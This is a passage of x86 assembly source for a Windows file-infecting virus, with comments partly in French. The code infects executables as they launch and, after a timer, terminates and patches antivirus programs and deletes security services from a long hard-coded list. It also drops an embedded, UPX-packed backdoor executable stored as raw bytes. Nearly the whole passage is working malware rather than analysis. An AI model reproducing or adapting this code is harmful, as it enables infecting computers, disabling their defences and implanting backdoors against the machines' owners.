Restore Stack + + xor edx,edx + pop dword ptr fs:[edx] + + + db 0BDh + win_infectDelta dd 00000000h ; Restore Delta + + + ;################################################################################# + CmpInfTime: + add esp, 120 + + cmp byte ptr [ebp + NewSystem],0 + jnz no_drop + + lea eax, dword ptr [ebp + CreationTime] ; retrieve current time + push eax + lea eax, dword ptr [ebp + szGetSystemTimeAsFileTime] + Call K32Api + + mov eax, dword ptr [ebp + InfectionTime].dwLowDateTime + sub eax, dword ptr [ebp + CreationTime].dwLowDateTime ; substract current time + ;mov dword ptr [ebp + TimeDifference].dwLowDateTime, eax + + + mov eax, dword ptr [ebp + InfectionTime].dwHighDateTime + sbb eax, dword ptr [ebp + CreationTime].dwHighDateTime ; substract current time + mov dword ptr [ebp + TimeDifference].dwHighDateTime, eax + + cmp eax, TIME_DROP + ja no_drop + + + + + CAll KillAVz ; après que TIME_DROP soit dépassé detruire les AVs + + lea eax, dword ptr [ebp + TS_Win] + push eax + push eax + lea eax, dword ptr [ebp + szFindWindowA] + Call U32Api + or eax, eax + jnz no_drop ; Backdoor déjà implanté sur notre système ? + + + Call Drop_BackDoor ; non ??? implantons !! + + no_drop: + ENDIF + + + + + EnableHostExecutionOnError_handlder: + DB 0BCh + EnableHostExecutionOnError_Stack dd 00000000h ; Restore Stack + + xor edx,edx + pop dword ptr fs:[edx] + + db 0BDh + EnableHostExecutionOnError_Delta dd 00000000h ; Restore Delta + + + CALL SetupRegHook ; install virus + lea eax, dword ptr [ebp + szGetCommandLineA] + Call K32Api + + or byte ptr [eax],20h + cmp byte ptr [eax],41h + 32 + jb Return2host + cmp byte ptr [eax],5Ah + 32 + ja Return2host + + + + sub esp, 600 + + + mov edi, eax + + Call _strlen + mov ecx, eax + + mov al,'"' + repnz scasb + + + mov dword ptr [ebp + pFileName], edi + + mov al,'"' + repnz scasb + + + .IF byte ptr [edi] == ' ' ; in case of cmdline... 
+ + and byte ptr [edi-1],0 + mov eax, dword ptr [ebp + pFileName] + Call _strlen + mov ecx, eax + mov al,' ' + repnz scasb + and byte ptr [edi-1],0 + + .ELSE + and dword ptr [edi-1],0 + .ENDIF + + ;push edi + + sub esp, 380 + mov esi, esp + + + push esi + mov byte ptr [esi],' ' + + inc esi + + + @@: + mov al, byte ptr [edi] + mov byte ptr [esi], al + inc edi + inc esi + or al,al + jz @F + jmp @B + @@: + + pop esi + + + mov eax, dword ptr [ebp + pFileName] + + IF __RELEASE_MODE__ + + pushad + + + cmp byte ptr [ebp + NewSystem],0 + jnz SkipKill + xor edx, edx ; process is not active + mov eax, dword ptr [ebp + pFileName] + cmp dword ptr [ebp + TimeDifference].dwHighDateTime, TIME_DROP ; Time to engage kill routines ? + ja SkipKill + ;pushad + ;push 0 + ;push eax + ;push eax + ;push 0 + ;lea eax, [ebp + szMessageBoxA] + ;call U32Api + ;popad + Call KillAV ; Check if the file we are trying to run is an AV & if so kill it... + SkipKill: + popad + + ENDIF + + pushad + Call IsFileAV? + dec eax + popad + jz @F ; IS it an AV file ? + Call infect ; infect !!! 
+ @@: + + sub esp, (SIZEOF STARTUPINFO + 30) + mov ebx, esp + pushad + mov edi, ebx + mov ecx, (SIZEOF STARTUPINFO + 30) + xor al, al + rep stosb + popad + push ebx + lea eax, dword ptr [ebp + szGetStartupInfoA] + Call K32Api + + ;--- + sub esp, 280 + mov ecx, esp + + push ecx ; for lstricmp + + push 0FFh + push ecx + push 0 + lea eax, dword ptr [ebp + szGetModuleFileNameA] + Call K32Api + + + push dword ptr [ebp + pFileName] + lea eax, dword ptr [ebp + szlstrcmpiA] + Call K32Api + sub esp, -280 + + sub esp, (SIZEOF PROCESS_INFORMATION + 30) + mov edx, esp + pushad + mov edi, edx + mov ecx, (SIZEOF PROCESS_INFORMATION + 30) + xor al, al + rep stosb + popad + or eax, eax + jz skpexec + + + + sub esp, 280 + mov edi, esp + push esi + mov esi, dword ptr [ebp + pFileName] + mov eax, esi + call _strlen + mov ecx, eax + rep movsb + pop esi + + @@: + dec edi + cmp byte ptr [edi], '\' + jnz @B + and byte ptr [edi], 0 + mov ecx, esp ; ecx = repertoire de l'exe + + + + push edx + + xor eax,eax + push edx + push ebx + push ecx + push eax + push NORMAL_PRIORITY_CLASS + push eax + push eax + push eax + pushad + lea eax, dword ptr [ebp + szSHGetFileInfo] + push eax + push dword ptr [ebp + _Shell32] + Call dword ptr [ebp + _GetProcAddress] + mov ebx, eax + + sub esp, (SIZEOF SHFILEINFO + 80) + mov edi, esp + + push SHGFI_EXETYPE + push SIZEOF SHFILEINFO + push edi + push 0 + push dword ptr [ebp + pFileName] + Call ebx ; Get exe file type + add esp, (SIZEOF SHFILEINFO + 80) + + clc + .IF ax != 'EP' + stc ; Non-PE file, set carry on + .ENDIF + popad + .IF CARRY? 
+ push eax ; Non-PE file, don't use commandline + .ELSE + push esi ; PE file, preserve commandline + .ENDIF + push dword ptr [ebp + pFileName] + lea eax, dword ptr [ebp + szCreateProcessA] + Call K32Api + + pop ebx + + push [ebx+4] + lea eax, dword ptr [ebp + szCloseHandle] + Call K32Api + + + skpexec: + add esp, (600 + 380 + 280 + SIZEOF STARTUPINFO + SIZEOF PROCESS_INFORMATION + 60 ) ; Fix stack + +Return2host: + + + + FreeLib: + + + push dword ptr [ebp + _Shell32] + lea eax,dword ptr [ebp+szFreeLibrary] + Call K32Api + + push dword ptr [ebp + _USER32] + lea eax,dword ptr [ebp+szFreeLibrary] + Call K32Api + + cmp dword ptr [ebp + hSFC], 0 ; Was it loaded ? + jz @F + push dword ptr [ebp + hSFC] + lea eax, dword ptr [ebp + szFreeLibrary] + Call K32Api + @@: + + + push dword ptr [ebp + _ADVAPI32] + lea eax, dword ptr [ebp + szFreeLibrary] + Call K32Api + + cmp dword ptr [ebp + _PSAPI], 0 ; Was it loaded ? + jz @F + push dword ptr [ebp + _PSAPI] + lea eax, dword ptr [ebp + szFreeLibrary] + Call K32Api + @@: + + jmp ZeroShit ; Clear shit And return 2 host + + + + + BytesNeeded dd 0 + + KillAVz proc + + .IF dword ptr [ebp + WinVer] == VER_PLATFORM_WIN32_NT + + + Call KillHostileDrivers ; kill Hostile NT services first + + sub esp, 2500 + mov ebx, esp + lea eax, dword ptr [ebp + BytesNeeded] + push eax + push 2400 + push ebx + lea eax, dword ptr [ebp + szEnumProcesses] + Call PSAPIApi + + + mov esi, ebx + nextone: + mov ecx, dword ptr [esi] + jecxz Skipit + + push ecx + push 0 + push PROCESS_ALL_ACCESS + lea eax, dword ptr [ebp + szOpenProcess] + Call K32Api + + or eax, eax + jz Skipit + + push eax ; <- For CloseHandle + + + sub esp, 300 + mov edi, esp + + push eax + + push 256 + push edi + push 0 + push eax + lea eax, dword ptr [ebp + szGetModuleFileNameExA] + Call PSAPIApi + + pop edx + + sub eax, 4 + js NOgood + + mov eax, edi + Call KillAV + + + mov ecx, (256 / 4) + xor eax, eax + rep stosd + + NOgood: + add esp, 300 + lea eax, dword ptr [ebp + szCloseHandle] + Call 
K32Api + + Skipit: + add esi, 4 + mov eax, ebx + add eax, 1024 + cmp esi, eax + jle nextone + + Call KillHostileDrivers ; kill Hostile NT services next :) + + add esp, 2500 + + .ELSE + + push 0 + push TH32CS_SNAPPROCESS + lea eax, dword ptr [ebp + szCreateToolhelp32Snapshot] + Call K32Api + inc eax + jz ErrNoSnapshot + dec eax + mov esi, eax + + sub esp, SIZEOF PROCESSENTRY32 + 30 + mov ebx, esp + assume ebx : ptr PROCESSENTRY32 + mov [ebx].dwSize, SIZEOF PROCESSENTRY32 + push ebx + push esi + lea eax, dword ptr [ebp + szProcess32First] + Call K32Api + nextone9x: + + push dword ptr [ebx].th32ProcessID + push 0 + push PROCESS_ALL_ACCESS + lea eax, dword ptr [ebp + szOpenProcess] + Call K32Api + or eax, eax + jz ErrOpen9x + lea edx, dword ptr [ebx].szExeFile + xchg eax, edx + Call KillAV + ErrOpen9x: + push ebx + push esi + lea eax, dword ptr [ebp + szProcess32Next] + Call K32Api + + or eax,eax + jnz nextone9x + + push esi + lea eax, dword ptr [ebp + szCloseHandle] + Call K32Api + + add esp, SIZEOF PROCESSENTRY32 + 30 + assume ebx : nothing + ErrNoSnapshot: + .ENDIF + + ret + + KillAVz endp + +services db "AMON",0 + db "avpg",0 + db "AVPCC",0 + db "Aavmker",0 + db "Avast32 Start as Service",0 + db "AvMon2",0 + db "AvUpdSvc",0 + db "KAVMonitorService",0 + db "NOD32Service",0 + db "PersFw",0 + db "vsmon",0 + db "Vsapint",0 + db "Tmpreflt",0 + db "Tmntsrv",0 + db "Tmfilter",0 + db "PCCPFW",0 + db "PCC_PFW",0 + db "wg3n",0 + db "SmcService",0 + db 0 + + + + KillHostileDrivers proc + + xor esi, esi + push SC_MANAGER_ALL_ACCESS + push esi + push esi + lea eax, dword ptr [ebp + szOpenSCManagerA] + Call ADVAPI32Api + mov ebx, eax + lea esi, dword ptr [ebp + services] + KillServiceLoop: + + push SERVICE_ALL_ACCESS + push esi + push ebx + lea eax, dword ptr [ebp + szOpenServiceA] + Call ADVAPI32Api + mov edi, eax + or edi, edi + jz NextService + push ebx + sub esp, SIZEOF SERVICE_STATUS + 20 + mov ebx, esp + + push ebx + push SERVICE_CONTROL_STOP + push edi + lea eax, dword 
ptr [ebp + szControlService] + Call ADVAPI32Api + + add esp, SIZEOF SERVICE_STATUS + 20 + pop ebx + + push edi + lea eax, dword ptr [ebp + szDeleteService] + Call ADVAPI32Api + + push edi + lea eax, dword ptr [ebp + szCloseServiceHandle] + Call ADVAPI32Api + NextService: + mov eax, esi + call _strlen + add esi, eax + inc esi + cmp byte ptr [esi],0 ; No more service ? + jz @F ; Exit loop + jmp KillServiceLoop ; Compare with next service + @@: + + push ebx + lea eax, dword ptr [ebp + szCloseServiceHandle] + Call ADVAPI32Api + + ret + KillHostileDrivers endp + + AV_lst db "Autodown.exe",0 + db "Tmntsrv.exe",0 + db "amon.exe",0 + db "avmaisrv.exe",0 + db "avserver.exe",0 + db "nod32.exe",0 + db "nod32cc.exe",0 + db "Zonealarm.exe",0 + db "zapro.exe",0 + db "Wfindv32.exe",0 + db "Webscanx.exe",0 + db "Vsstat.exe",0 + db "Vshwin32.exe",0 + db "Vsecomr.exe",0 + db "Vscan40.exe",0 + db "Vettray.exe",0 + db "Vet95.exe",0 + db "Tds2-Nt.exe",0 + db "Tds2-98.exe",0 + db "Tca.exe",0 + db "Tbscan.exe",0 + db "Sweep95.exe",0 + db "Sphinx.exe",0 + db "Smc.exe",0 + db "Serv95.exe",0 + db "Scrscan.exe",0 + db "Scanpm.exe",0 + db "Scan95.exe",0 + db "Scan32.exe",0 + db "Safeweb.exe",0 + db "Rescue.exe",0 + db "Rav7win.exe",0 + db "Rav7.exe",0 + db "Persfw.exe",0 + db "Pcfwallicon.exe",0 + db "Pccwin98.exe",0 + db "Pccguide.exe",0 + db "Pccclient.exe",0 + db "Pavw.exe",0 + db "Pavsched.exe",0 + db "Pavcl.exe",0 + db "Padmin.exe",0 + db "Outpost.exe",0 + db "Nvc95.exe",0 + db "Nupgrade.exe",0 + db "Normist.exe",0 + db "Nmain.exe",0 + db "Nisum.exe",0 + db "Navwnt.exe",0 + db "Navw32.exe",0 + db "Navnt.exe",0 + db "Navlu32.exe",0 + db "Navapw32.exe",0 + db "N32scanw.exe",0 + db "Mpftray.exe",0 + db "Moolive.exe",0 + db "Luall.exe",0 + db "Lookout.exe",0 + db "Lockdown2000.exe",0 + db "Jedi.exe",0 + db "Iomon98.exe",0 + db "Iface.exe",0 + db "Icsuppnt.exe",0 + db "Icsupp95.exe",0 + db "Icmon.exe",0 + db "Icloadnt.exe",0 + db "Icload95.exe",0 + db "Ibmavsp.exe",0 + db "Ibmasn.exe",0 + db 
"Iamserv.exe",0 + db "Iamapp.exe",0 + db "Frw.exe",0 + db "Fprot.exe",0 + db "Fp-Win.exe",0 + db "Findviru.exe",0 + db "F-Stopw.exe",0 + db "F-Prot95.exe",0 + db "F-Prot.exe",0 + db "F-Agnt95.exe",0 + db "Espwatch.exe",0 + db "Esafe.exe",0 + db "Ecengine.exe",0 + db "Dvp95_0.exe",0 + db "Dvp95.exe",0 + db "Cleaner3.exe",0 + db "Cleaner.exe",0 + db "Claw95cf.exe",0 + db "Claw95.exe",0 + db "Cfinet32.exe",0 + db "Cfinet.exe",0 + db "Cfiaudit.exe",0 + db "Cfiadmin.exe",0 + db "Blackice.exe",0 + db "Blackd.exe",0 + db "Avwupd32.exe",0 + db "Avwin95.exe",0 + db "Avsched32.exe",0 + db "Avpupd.exe",0 + db "Avptc32.exe",0 + db "avpm.exe",0 + db "Avpdos32.exe",0 + db "Avpcc.exe",0 + db "Avp32.exe",0 + db "Avp.exe",0 + db "Avnt.exe",0 + db "Avkserv.exe",0 + db "Avgctrl.exe",0 + db "Ave32.exe",0 + db "Avconsol.exe",0 + db "Apvxdwin.exe",0 + db "Anti-Trojan.exe",0 + db "Ackwin32.exe",0 + db "_Avpm.exe",0 + db "_Avpcc.exe",0 + db "_Avp32.exe",0 + db "Vsmon.exe",0 + db "Smc.exe",0 + db 0 + + +IsFileAV? proc + ; in : eax = pointer to filename + ; out : eax == 1 if FileName Is a AV one, else eax == 0 + + sub esp, SIZEOF WIN32_FIND_DATA + 50 + + mov edi, esp + + push edi + assume edi : ptr WIN32_FIND_DATA + push eax + lea eax, dword ptr [ebp + szFindFirstFileA] + Call K32Api + lea edi, [edi].cFileName ; Always get the long filename + assume edi : nothing + + push eax + lea eax, dword ptr [ebp + szFindClose] + CAll K32Api + + + + cmp byte ptr [edi+1], ':' + jnz JustExe + + mov eax, edi + + + + Call _strlen + add edi, eax + @@: + dec edi + cmp byte ptr [edi], '\' + jnz @B + inc edi + + JustExe: + lea esi, dword ptr [ebp + AV_lst] + AV_scan_loop: + + push edi + push esi + lea eax, dword ptr [ebp + szlstrcmpiA] ; compare it with one AV ? + Call K32Api + + or eax, eax ; name is matching ? + jnz NotListedAV + + add esp, SIZEOF WIN32_FIND_DATA + 50 + + inc eax ; AV return 1 + ret + + NotListedAV: + mov eax, esi + Call _strlen + add esi, eax + inc esi + cmp byte ptr [esi],0 ; No more AV ? 
+ jz @F ; Exit loop + jmp AV_scan_loop ; Compare with next AV + @@: + add esp, SIZEOF WIN32_FIND_DATA + 50 + xor eax, eax + ret + +IsFileAV? endp + +pid dd 0 + ;test_file db "c:\windows\system32\host.exe",0 + ; in : eax = pointer to filename to process + ; edx = process handle IF the process to be trashed is active ELSE put NULL + + KillAV proc + pushad + mov ebx, eax ; put pointer to filename into ebx + mov dword ptr [ebp + pid], edx + + sub esp, SIZEOF WIN32_FIND_DATA + 50 + mov edi, esp + + push edi + assume edi : ptr WIN32_FIND_DATA + push ebx + lea eax, dword ptr [ebp + szFindFirstFileA] + Call K32Api + lea edi, [edi].cFileName ; Always get the long filename + assume edi : nothing + + push eax + lea eax, dword ptr [ebp + szFindClose] + CAll K32Api + + + + cmp byte ptr [edi+1], ':' + jnz JustExe + + mov eax, edi + Call _strlen + add edi, eax + @@: + dec edi + cmp byte ptr [edi], '\' + jnz @B + inc edi ; reach byte after last '\' + + JustExe: + lea esi, dword ptr [ebp + AV_lst] + + ;pushad + ;push 0 + ;push edi + ;push ebx + ;push 0 + ;lea eax, [ebp + szMessageBoxA] + ;call U32Api + ;popad + AV_scan_loop: + + + + push edi + push esi + lea eax, dword ptr [ebp + szlstrcmpiA] ; compare it with one AV ? + Call K32Api + + + or eax, eax ; name is matching ? + jnz NotListedAV + + + + push dword ptr [edi] + or dword ptr [edi], 20202020h + cmp dword ptr [edi], 'mpva' ; Avp monitor ? + pop dword ptr [edi] + + jz @F ; don't kill it + + mov ecx, dword ptr [ebp + pid] + jecxz @F ; is process running ? no skip + push eax + push ecx + lea eax, dword ptr [ebp + szTerminateProcess] ; kill ! 
+ Call K32Api + @@: + + ;pushad + ;push 0 + ;push edi + ;push ebx + ;push 0 + ;lea eax, [ebp + szMessageBoxA] + ;call U32Api + ;popad + + Call PatchAV ; Extra (may only work when prossess + ; is about to be launched due to + ; the latency time necessary to unload + ; image from the memory and, thus, writing + NotListedAV: ; to the file on disk) + mov eax, esi + Call _strlen + add esi, eax + inc esi + cmp byte ptr [esi],0 ; No more AV ? + jz @F ; Exit loop + jmp AV_scan_loop ; Compare with next AV + @@: + add esp, SIZEOF WIN32_FIND_DATA + 50 + popad + ret + KillAV endp + + + PatchAV proc uses edx ; in : ebx = pointer to full path of file to patch. + pushad + + + + push FILE_ATTRIBUTE_NORMAL + push ebx + lea eax, dword ptr [ebp + szSetFileAttributesA] ; reset attributes + Call K32Api + + + xor esi, esi + push esi + push FILE_ATTRIBUTE_NORMAL + push OPEN_EXISTING + push esi + push FILE_SHARE_READ or FILE_SHARE_WRITE + push GENERIC_READ or GENERIC_WRITE + push ebx + lea eax, dword ptr [ebp + szCreateFileA] + Call K32Api + + inc eax + jz ErrOpen + dec eax + mov dword ptr [ebp + hFile],eax + + + push esi + push esi + push esi + push PAGE_READWRITE + push esi + push dword ptr [ebp + hFile] + lea eax,[ebp+szCreateFileMappingA] + call K32Api + + + + or eax,eax + jz ErrCloseFa + + mov dword ptr [ebp + hMap],eax + + push esi + push esi + push esi + push FILE_MAP_ALL_ACCESS + push dword ptr [ebp+hMap] + lea eax,dword ptr [ebp+szMapViewOfFile] + call K32Api + + test eax,eax + jz ErrShit + + mov dword ptr [ebp + pMap],eax + + cmp word ptr [eax],IMAGE_DOS_SIGNATURE + jnz ErrShit + mov edi,[eax+3ch] + add edi,eax + cmp dword ptr [edi],IMAGE_NT_SIGNATURE + jnz ErrShit + + assume edi : ptr IMAGE_NT_HEADERS + + mov edi,[edi].OptionalHeader.AddressOfEntryPoint + mov esi,dword ptr [ebp + pMap] + Call RVAToOffset ; get raw offset + add eax,dword ptr [ebp + pMap] ; add base address + assume edi : nothing + mov edi,eax + mov al, 0C3h ; patch entrypoint with "return to windows" + stosb + 
Call Random32 + and eax,07Fh + Call GenTrashBlk ; add shit ... + ; this should make it a bit harder to repair :-) + ErrShit: + Call UnMap + ErrCloseFa: + push dword ptr [ebp+hFile] + lea eax, dword ptr [ebp + szCloseHandle] + Call K32Api + ErrOpen: + + popad + ret + PatchAV endp + + + + + + + + + + + + BackdoorStart db 77,90,144,0,3,0,0,0,4,0,0,0,255,255,0,0 + db 184,0,0,0,0,0,0,0,64,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,176,0,0,0 + db 14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104 + db 105,115,32,112,114,111,103,114,97,109,32,99,97,110,110,111 + db 116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32 + db 109,111,100,101,46,13,13,10,36,0,0,0,0,0,0,0 + db 85,217,249,219,17,184,151,136,17,184,151,136,17,184,151,136 + db 17,184,151,136,146,184,151,136,237,152,133,136,19,184,151,136 + db 82,105,99,104,17,184,151,136,0,0,0,0,0,0,0,0 + db 80,69,0,0,76,1,3,0,143,87,26,64,0,0,0,0 + db 0,0,0,0,224,0,15,1,11,1,5,12,0,48,0,0 + db 0,16,0,0,0,192,1,0,48,242,1,0,0,208,1,0 + db 0,0,2,0,0,0,64,0,0,16,0,0,0,2,0,0 + db 4,0,0,0,0,0,0,0,4,0,0,0,0,0,0,0 + db 0,16,2,0,0,16,0,0,0,0,0,0,2,0,0,0 + db 0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0 + db 0,0,0,0,16,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,2,0,232,1,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,85,80,88,48,0,0,0,0 + db 0,192,1,0,0,16,0,0,0,0,0,0,0,4,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,128,0,0,224 + db 85,80,88,49,0,0,0,0,0,48,0,0,0,208,1,0 + db 0,36,0,0,0,4,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,64,0,0,224,85,80,88,50,0,0,0,0 + db 0,16,0,0,0,0,2,0,0,2,0,0,0,40,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,64,0,0,192 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,49,46,50,51,0 + db 85,80,88,33,12,9,2,8,175,233,133,239,104,160,181,151 + db 81,216,1,0,45,34,0,0,0,92,0,0,38,1,0,158 + db 223,91,254,255,106,3,232,1,0,59,88,199,5,79,148,64 + db 0,148,0,104,8,19,22,223,255,238,230,131,61,95,2,117 + db 79,13,58,212,104,2,195,65,0,106,40,80,26,190,92,190 + db 221,237,104,144,97,25,104,156,4,106,0,63,184,140,97,175 + db 105,54,179,1,9,152,2,106,1,249,247,142,108,37,140,255 + db 53,63,60,148,104,0,96,99,187,255,158,4,88,20,11,192 + db 117,55,8,50,130,74,58,205,221,125,246,254,163,12,137,25 + db 194,163,16,9,131,37,20,41,65,239,96,239,149,10,14,73 + db 32,1,61,140,172,251,253,255,58,158,85,139,236,131,196,232 + db 255,117,248,141,69,252,17,60,24,82,102,123,118,107,182,119 + db 56,98,41,17,6,84,30,244,80,3,117,111,176,238,240,80 + db 25,1,155,247,198,171,128,177,205,246,253,152,214,199,69,85 + db 19,39,232,236,80,65,96,221,183,153,38,90,240,31,220,68 + db 13,11,183,177,246,237,208,139,32,201,195,51,192,3,125,176 + db 58,208,48,236,62,114,115,242,6,212,3,216,30,18,64,13 + db 220,0,114,251,236,141,224,6,183,143,69,228,22,240,6,59 + db 156,112,54,244,29,248,15,127,49,208,101,192,182,246,68,137 + db 
128,2,252,17,62,139,117,199,182,236,145,208,238,86,106,143 + db 8,155,61,108,9,175,172,128,4,207,0,96,62,155,125,219 + db 114,57,246,176,51,176,61,110,248,76,118,216,109,100,180,44 + db 210,116,20,12,104,8,255,221,111,31,2,235,217,222,188,201 + db 194,16,0,220,129,196,0,254,255,255,131,125,12,240,159,251 + db 27,8,47,104,222,192,173,222,125,36,56,255,21,240,117,158 + db 61,219,142,93,31,217,218,232,10,58,188,176,80,233,115,161 + db 208,221,4,3,19,52,1,136,192,143,150,239,125,174,123,141 + db 13,115,24,149,139,11,129,81,4,42,3,107,187,177,140,114 + db 116,206,136,19,37,97,51,220,157,225,92,163,28,48,12,143 + db 5,24,8,142,217,220,247,109,80,5,114,141,4,169,27,133 + db 236,187,173,97,187,235,79,129,107,18,122,117,187,68,10,19 + db 1,247,238,183,53,16,8,16,78,117,50,44,7,169,235,43 + db 24,237,221,183,102,13,4,13,221,16,139,77,20,21,53,167 + db 235,21,68,225,61,91,182,20,2,16,12,118,57,252,248,217 + db 216,118,183,153,254,117,225,98,189,116,4,15,28,217,94,107 + db 238,139,212,219,65,1,145,21,14,220,35,75,247,216,161,251 + db 215,65,8,12,255,16,101,100,121,46,3,216,20,7,24,89 + db 70,150,145,11,28,15,32,19,9,228,230,130,24,165,19,23 + db 216,65,101,228,141,127,119,104,40,218,65,204,1,1,0,138 + db 221,223,24,238,15,133,75,236,200,2,18,204,163,184,137,64 + db 217,124,239,241,15,132,47,3,104,140,41,168,132,28,188,212 + db 189,189,139,64,12,139,4,0,163,192,37,102,161,188,219,65 + db 237,220,253,219,106,25,35,174,102,163,190,21,106,16,104,59 + db 15,166,231,123,72,101,162,224,27,60,104,240,10,102,251,61 + db 50,50,48,32,15,197,17,181,198,109,195,182,69,10,71,229 + db 4,112,17,31,106,64,109,115,159,245,222,48,120,16,17,112 + db 163,35,179,138,30,222,179,20,68,81,53,16,96,240,179,237 + db 96,151,47,12,161,12,54,205,46,80,26,185,108,251,101,122 + db 198,131,248,255,183,89,123,53,10,105,110,230,73,79,3,216 + db 91,60,35,7,22,70,2,7,109,224,169,13,148,187,11,130 + db 7,13,31,217,123,49,205,71,38,51,53,52,48,148,205,30 + db 237,146,1,45,35,1,124,56,146,231,225,201,31,255,125,24 + 
db 76,201,20,214,172,44,166,161,31,223,30,123,79,181,61,184 + db 11,104,118,6,255,5,152,80,17,30,254,101,205,89,3,200 + db 137,13,208,230,4,169,141,246,17,132,81,164,31,241,14,24 + db 177,239,151,153,204,46,139,200,139,61,17,139,102,247,247,34 + db 219,243,164,127,15,19,55,130,104,219,132,121,9,239,178,15 + db 161,9,55,204,219,128,92,114,10,131,0,212,46,123,135,45 + db 158,192,159,171,95,118,164,67,59,53,106,120,9,76,115,88 + db 187,63,120,116,55,161,22,57,5,216,13,117,35,133,245,67 + db 224,166,14,2,106,5,25,192,104,147,150,37,233,252,158,147 + db 134,163,42,131,37,179,236,32,124,147,118,156,4,132,163,116 + db 51,127,132,5,249,28,26,195,27,218,21,193,98,109,200,31 + db 75,52,28,221,235,13,132,229,151,28,34,104,212,129,241,225 + db 39,58,164,195,106,126,27,216,234,133,228,221,203,192,4,117 + db 34,24,1,104,39,218,4,190,127,111,234,231,128,61,21,10 + db 117,222,161,54,195,142,50,207,134,114,124,255,188,0,191,174 + db 117,249,93,200,29,125,31,245,141,61,8,120,185,0,43,214 + db 123,203,238,202,243,171,104,13,17,9,188,125,36,6,80,40 + db 180,104,75,146,23,80,104,21,8,31,193,78,6,34,81,16 + db 19,134,111,96,225,88,80,94,8,120,116,70,141,53,219,65 + db 222,127,134,217,141,5,34,229,61,56,192,89,141,185,17,205 + db 29,110,52,45,33,128,39,118,13,4,71,222,61,205,247,96 + db 219,203,52,86,104,186,96,3,25,3,15,18,177,143,77,49 + db 204,104,231,205,114,7,214,50,181,203,227,25,53,107,104,232 + db 165,123,191,2,18,24,64,174,103,54,247,169,125,18,24,127 + db 0,179,151,125,114,123,35,33,227,148,150,106,15,12,186,197 + db 70,12,10,211,120,115,161,248,223,203,130,140,27,144,163,26 + db 141,117,206,139,254,86,137,8,175,237,52,1,86,26,16,120 + db 18,95,120,96,175,127,141,19,172,60,131,215,88,64,64,4 + db 233,255,255,59,198,116,34,87,176,10,106,50,89,242,174,128 + db 103,255,0,95,139,199,48,224,178,223,44,34,10,243,166,11 + db 201,116,23,56,156,92,98,19,193,252,14,8,202,1,177,25 + db 227,161,83,210,119,163,42,90,10,54,194,194,94,236,100,41 + db 
168,64,144,195,114,140,47,27,117,3,92,251,86,112,113,178 + db 199,67,69,254,233,120,114,198,64,83,251,147,185,21,149,20 + db 46,141,133,140,252,41,145,13,55,14,33,83,248,24,147,151 + db 93,161,250,231,224,221,6,105,5,171,87,104,254,29,24,206 + db 71,128,63,27,123,95,88,72,250,118,7,62,0,184,34,215 + db 145,166,54,113,97,175,104,13,95,196,169,128,101,195,221,120 + db 214,254,76,139,247,98,185,250,109,103,130,217,86,66,75,44 + db 151,79,173,224,232,70,67,115,198,86,207,133,126,183,240,43 + db 198,6,32,25,149,71,59,241,114,30,78,78,15,11,216,118 + db 236,251,32,8,49,3,141,10,80,120,101,109,103,123,67,133 + db 157,198,70,1,119,53,61,63,242,105,120,179,93,142,60,36 + db 116,28,12,21,57,103,255,238,27,18,50,9,236,173,13,32 + db 0,151,137,125,251,129,255,105,110,49,129,221,198,102,111,17 + db 213,173,51,219,12,54,7,4,102,120,16,157,1,243,215,27 + db 251,56,92,199,133,103,162,141,9,80,6,69,185,125,103,99 + db 41,178,28,100,252,225,108,231,161,35,100,100,6,104,76,236 + db 236,9,255,200,106,9,104,66,145,230,106,8,90,16,17,235 + db 62,132,87,148,149,104,20,117,34,100,48,236,126,127,237,242 + db 209,12,141,29,120,5,61,190,24,96,86,255,119,177,245,224 + db 